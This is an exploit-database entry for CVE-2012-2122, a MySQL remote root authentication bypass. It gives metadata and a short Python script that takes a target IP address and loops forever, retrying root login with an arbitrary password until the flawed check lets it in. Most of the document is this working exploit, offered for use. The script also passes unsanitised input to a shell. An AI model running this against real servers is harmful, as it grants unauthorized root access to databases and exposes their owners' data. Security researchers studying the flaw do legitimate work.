MySQL - Authentication Bypass

Author: David Kennedy (ReL1K)
type: remote
platform: multiple
port: 
date_added: 2012-06-12  
date_updated: 2016-12-05  
verified: 1  
codes: OSVDB-82804;CVE-2012-2122  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19092.py  

#!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess

ipaddr = raw_input("Enter the IP address of the mysql server: ")

while 1:
	subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()